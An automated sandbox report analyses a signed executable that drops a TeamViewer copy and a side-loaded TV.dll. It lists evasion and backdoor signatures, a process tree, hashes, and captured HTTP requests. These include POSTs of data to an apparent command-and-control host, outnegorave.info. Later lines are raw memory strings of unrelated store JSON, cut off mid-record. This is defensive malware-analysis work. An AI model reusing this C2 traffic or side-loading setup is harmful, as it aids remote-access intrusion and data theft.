Windows Analysis Report 77Etc0bR2v.exe

Overview

General Information

Sample Name: 77Etc0bR2v.exe
Analysis ID: 483795
MD5: e71e3b995477081569ed357e4d403666
SHA1: 809c4cc4ae51fcf3eca24e7d7fa5c1b6b5db52ce
SHA256: 94b9abbe10bd9d6abcb8dce27814992bf7a09ed416c66998bd3496bda1490713
Tags: exeHartexLLCsignedsoldewornek

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 17
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Creates processes via WMI
DLL side loading technique detected
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
EXE planting / hijacking vulnerabilities found
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • svchost.exe (PID: 6400 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • 77Etc0bR2v.exe (PID: 6880 cmdline: 'C:\Users\user\Desktop\77Etc0bR2v.exe' MD5: E71E3B995477081569ED357E4D403666)
    • TeamViewer.exe (PID: 6952 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 5424 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 5512 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5568 cmdline: c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 3216 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • TeamViewer.exe (PID: 1972 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 5724 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 6052 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 4928 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • TeamViewer.exe (PID: 6704 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 5860 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: 77Etc0bR2v.exe, Virustotal: Detection: 37%
Source: 77Etc0bR2v.exe, ReversingLabs: Detection: 37%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll, ReversingLabs: Detection: 26%
Source: 1.2.77Etc0bR2v.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 3_2_0049B32E __EH_prolog3,CryptGenRandom,__CxxThrowException@8,3_2_0049B32E
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 3_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,__CxxThrowException@8,3_2_0049B4A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 3_2_006F605B CryptReleaseContext,3_2_006F605B

Compliance:

Uses 32bit PE files
Source: 77Etc0bR2v.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, EXE: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: SHFolder.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, DLL: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, DLL: VERSION.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: version.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: uxtheme.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, DLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: iertutil.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, DLL: urlmon.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, DLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, DLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: winsta.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: msimg32.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, DLL: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
Uses secure TLS version for HTTPS connections
Source: unknown, HTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.6:49758 version: TLS 1.2
PE / OLE file has a valid certificate
Source: 77Etc0bR2v.exe, Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp, svchost.exe, 00000006.00000002.748672807.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.467680448.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.479287656.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.475980706.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485151608.000000006F33D000.00000002.00020000.sdmp, nso5B2F.tmp.1.dr
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, Code function: 1_2_00405E61 FindFirstFileA,FindClose,1_2_00405E61
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, Code function: 1_2_0040263E FindFirstFileA,1_2_0040263E
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, Code function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_0040548B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 2_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,2_2_6F332DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 2_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,2_2_6F3328B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 3_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW,3_2_004BF3A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 3_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose,3_2_0050331C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 3_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,3_2_6F332DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 3_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,3_2_6F3328B0
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 6_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,6_2_6F332DF0
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 6_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,6_2_6F3328B0
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 87812Content-Type: multipart/form-data; boundary=--------2771230636User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 90555Content-Type: multipart/form-data; boundary=--------2341619378User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 86397Content-Type: multipart/form-data; boundary=--------1750076427User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172965&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFB HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172969&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdr HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172973&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172978&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12852408&p=10000001&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Content-Length: 3Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12852408&p=10000002&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Content-Length: 500000Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Connection: Keep-AliveCache-Control: no-cache
Source: unknown, Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown, TCP traffic detected without corresponding DNS query: 37.252.232.109
MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-09-03T08:13:47.6485296Z||.||9eff4c9e-5599-4773-81dc-0299af880dd5||1152921505693851877||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000E.00000003.479875283.000001C495993000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV"," equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000E.00000003.479875283.000001C495993000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV"," equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detec equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detec equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes 